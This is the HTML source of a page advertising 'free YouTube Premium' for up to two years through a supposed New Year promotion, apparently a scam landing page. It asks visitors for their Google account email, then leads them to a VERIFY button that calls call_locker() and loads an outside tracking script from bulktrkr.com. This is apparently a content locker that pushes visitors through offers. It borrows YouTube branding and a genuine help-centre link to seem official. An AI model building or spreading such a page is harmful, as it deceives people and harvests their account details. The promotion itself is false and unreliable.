<!doctype html>
<html lang="en">

<head>

    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="stylesheet" href="bootstrap.min.css">
    <link rel="stylesheet" href="main.css">
    <link rel="icon" href="favicon.png" sizes="96x96">
    <title>Get free YouTube Premium</title>

</head>

<body>

    <div class="container">

        <div class="t-top"><img class="yt-top" src="TOP.png"></div>

        <div class="row justify-content-center">

            <div class="col-12 col-sm-9 text-center">

                <img class="img-fluid w-80 mb-2 logo" src="logo-2.png">

                <p class="r400 fs11 mt-2 mb-2 S1">YouTube and YouTube Music ad-free</p>

                <p class="r400 fs09 pl-4 pr-4 S1 YEARS">Get up to 2 years of free <span class="r500">YouTube Premium</span><br>thanks to our New Year promotion.</p>

                <button type="button" class="btn btn-primary fs09 pl-2 pr-2 mb-4 YTP-button S1 mx-auto" onclick="YTP();">GET FOR FREE</button>

                <p class="r400 fs105 mt-2 mb-1 S2">Type in your <span class="r500">Google account Email</span>.</p>

                <input type="email" class="form-control mb-2 w-80 mx-auto S2" id="YTemail" placeholder="youremail@gmail.com">

                <p class="r400 fs105 mt-2 mb-1 S2">Choose <span class="r500">free YouTube Premium</span> duration.</p>

                <select class="form-control w-80 mx-auto mb-2 S2" id="YTlength">
                  <option value="">How long?</option>
                  <option value="3">3 months</option>
                  <option value="6">6 months</option>
                  <option value="1">1 year</option>
                  <option value="2">2 years</option>
                </select>

                <button type="button" class="btn btn-primary fs09 pl-2 pr-2 mb-4 S2 mx-auto CON-button" onclick="CON();">CONTINUE</button>

                <div class="S3 mx-auto" id="PRO"></div>

                <!--<p class="r400 fs09 pl-4 pr-4 S1">Get up to 2 years of free <span class="r500">YouTube Premium</span><br>thanks to our New Year promotion.</p>-->

                <button type="button" class="btn btn-danger btn-lg fs09 pl-2 pr-2 mb-4 mt-2 S4 mx-auto VER-button" onclick="call_locker();">VERIFY</button>

                <hr>

            </div>

        </div>

        <div class="row justify-content-center GRAYBG">

            <div class="col-12 text-center">

              <div class="row justify-content-center">

                <div class="col-12 col-md-4 MBMT">

                    <div class="row justify-content-center">

                        <div class="col-2 col-md-5 YT-icon"><img src="1.png" class="img-fluid"></div>

                        <div class="col-10 col-md-12">

                            <p class="r400 fs12 mb-1">Ad-free & background play</p>
                            <p class="r400 fs09 G mb-0 DE">Watch videos uninterrupted by ads, while using other apps, or when the screen is locked.</p>

                        </div>

                    </div>

                </div>

                <div class="col-12 col-md-4 MBMT">

                    <div class="row justify-content-center">

                        <div class="col-2 col-md-5 YT-icon"><img src="2.png" class="img-fluid"></div>

                        <div class="col-10 col-md-12">

                            <p class="r400 fs12 mb-1">Downloads</p>
                            <p class="r400 fs09 G mb-0 DE">Save videos for when you really need them – like when you’re on a plane or commuting.</p>

                        </div>

                    </div>

                </div>

                <div class="col-12 col-md-4 MBMT">

                    <div class="row justify-content-center">

                        <div class="col-2 col-md-5 YT-icon"><img src="3.png" class="img-fluid"></div>

                        <div class="col-10 col-md-12">

                            <p class="r400 fs12 mb-1">YouTube Music Premium</p>
                            <p class="r400 fs09 G mb-0 DE">Download our new music app and listen without interruptions.</p>

                        </div>

                    </div>

                </div>

              </div>

            </div>

        </div>

        <div class="row justify-content-center">

          <div class="col-12 col-sm-9 text-center">

                    <hr>

                    <p class="r400 fs13 mb-1 mt-3 pt-3 pl-2 pr-2">Ad-free</p>
                    <p class="r400 fs09 G mb-4 pl-2 pr-2 PL">Enjoy watching YouTube uninterrupted by ads whenever you sign in - on your mobile device, desktop, or enabled TV.</p>
                    <div class="row justify-content-center"><img src="4.jpg" class="img-fluid mt-3 mb-4"></div>

                    <p class="r400 fs13 mb-1 mt-4 pl-2 pr-2">Download and go</p>
                    <p class="r400 fs09 G mb-4 pl-2 pr-2 PL">Save videos for when you’re low on data or can’t get online.</p>
                    <div class="row justify-content-center"><img src="3.jpg" class="img-fluid mt-3 mb-4"></div>

                    <p class="r400 fs13 mb-1 mt-4 pl-2 pr-2">Background play</p>
                    <p class="r400 fs09 G mb-4 pl-2 pr-2 PL">With YouTube Premium, your video plays uninterrupted in the background, even when you open another app.</p>
                    <div class="row justify-content-center"><img src="2.jpg" class="img-fluid mt-3 mb-4"></div>

                    <p class="r400 fs13 mb-1 mt-4 pl-2 pr-2">YouTube Music Premium</p>
                    <p class="r400 fs09 G mb-4 pl-2 pr-2 PL">Easily explore the world of music ad-free, offline, and with the screen locked. Available on mobile and desktop.</p>
                    <div class="row justify-content-center"><img src="1.jpg" class="img-fluid mt-3 mb-1"></div>

                    <hr>

                <p class="r400 fs075 G mb-1">Downloading and background play are available only on the YouTube Android and iOS mobile apps on supported devices.</p>

                <p class="r400 fs075 G mb-1">Have other questions?</p>

                <p class="r400 fs075 G mb-3">Visit the <a href="https://support.google.com/youtube">YouTube Help Center</a></p>

            </div>

        </div>

        <div class="t-bot"><img class="yt-bot" src="BOT.png"></div>

    </div>

    <script src="jquery-3.4.1.min.js"></script>
    <script src="popper.min.js"></script>
    <script src="bootstrap.min.js"></script>
    <script src="progressbar.js"></script>
    <script src="main.js"></script>

    <script type="text/javascript" src="https://bulktrkr.com/script_include.php?id=1012474"></script>

</body>

</html>
